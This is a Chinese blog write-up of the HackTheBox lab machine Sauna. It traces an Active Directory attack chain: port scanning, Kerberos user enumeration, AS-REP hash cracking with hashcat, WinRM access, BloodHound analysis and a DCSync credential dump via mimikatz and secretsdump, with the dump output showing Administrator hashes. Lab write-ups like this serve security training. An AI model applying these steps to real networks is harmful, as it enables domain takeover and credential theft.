• HTB::Sauna


    实验环境

    HTB_Sauna1

    渗透过程

    0x01 信息搜集

    sudo masscan 10.10.10.175 -p0-65535 --rate 1000 -e tun0
    

    HTB_Sauna2

    开放的端口非常多,进行详细测试:

    HTB_Sauna3.png

    开放80端口,尝试访问web服务:

    HTB_Sauna7

    测试扩展名:php、apx均无响应。该站为静态网站。

    从页面中获取可能的用户名信息:

    HTB_Sauna8

    保存为userlist.txt。

    0x02 摸索过程

    user.txt

    开放445端口,尝试获取smb信息:

    HTB_Sauna4

    得到系统信息、主机名、域名

    尝试获得smb开放共享信息:

    HTB_Sauna5

    没有权限。

    开放135端口,尝试使用rpcclient

    HTB_Sauna6

    登录成功,无法获取数据。

    开放139端口,尝试获得ldap信息:

    HTB_Sauna9

    开放88端口,利用前面得到的userlist进行用户名枚举:

    HTB_Sauna10

    得到两个用户名。

    尝试使用GetNPUsers脚本,获得用户TGT:

    HTB_Sauna11

    通过hashcat,获取该hash类型:

    HTB_Sauna12

    使用hashcat,对hash进行计算:

    ./hashcat -m 18200 ~/HTB/Sauna/hash.txt /usr/share/wordlists/rockyou.txt
    

    HTB_Sauna13

    获得密码,尝试使用密码进行smb shares 获取:

    HTB_Sauna14

    得到一些可以访问的目录,但是用处不大。

    开放5985端口,尝试能否使用winrm连接:

    HTB_Sauna15

    在桌面下获得user.txt。

    root.txt

    可以使用evil-winrmupload命令直接上传文件,然后执行./winPEAS.exe

    HTB_Sauna16

    得到一个新的用户与密码:

    HTB_Sauna17

    查看svc_loanmgr用户信息:

    HTB_Sauna18

    使用bloodhound,首先启动neo4j环境

    sudo neo4j console
    

    上传SharpHound脚本并运行:

    HTB_Sauna19

    将获得的数据下载到本地:

    download [filename]
    

    导入bloodhound得到拓扑图,从图中可以得到提示:svc_loanmanager用户可以使用DcSync获得Administrator权限:

    HTB_Sauna20

    mimikatz

    使用mimikatz进行DcSync攻击:

    上传mimikatz.exe到目标主机,获取administrator账号的NTML hash:

    HTB_Sauna21.png

    得到Hash,使用evil-winrm登录,得到root.txt:

    HTB_Sauna22.png

    secretsdump

    ~ python3 secretsdump.py EGOTISTICAL-BANK.LOCAL/svc_loanmgr@10.10.10.175                                     
    Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation
    
    Password:
    [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
    [*] Dumping Domain Credentials (domainuid:rid:lmhash:nthash)
    [*] Using the DRSUAPI method to get NTDS.DIT secrets
    Administrator:500:aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff:::
    [*] Kerberos keys grabbed
    Administrator:aes256-cts-hmac-sha1-96:987e26bb845e57df4c7301753f6cb53fcf993e1af692d08fd07de74f041bf031
    Administrator:aes128-cts-hmac-sha1-96:145e4d0e4a6600b7ec0ece74997651d0
    Administrator:des-cbc-md5:19d5f15d689b1ce5
    
    [*] Cleaning up... 
    

    使用psexec.py脚本,得到shell

    HTB_Sauna23

    得到root.txt

  • 相关阅读:
    spring 源码解析(三)
    spring 源码解析(三)
    spring 源码解析(三)
    spring 源码解析(三) 容器的实现
    spring 源码解析(二) 3.修改编译生成,生成自定义版本。
    spring 源码解析(二) 1.开发环境,环境的搭建。
    思维-J
    思维-Ayoub's function
    图-D
    思维-Codeforces 1294D
  • 原文地址:https://www.cnblogs.com/chalan630/p/13456017.html
Copyright © 2020-2023  润新知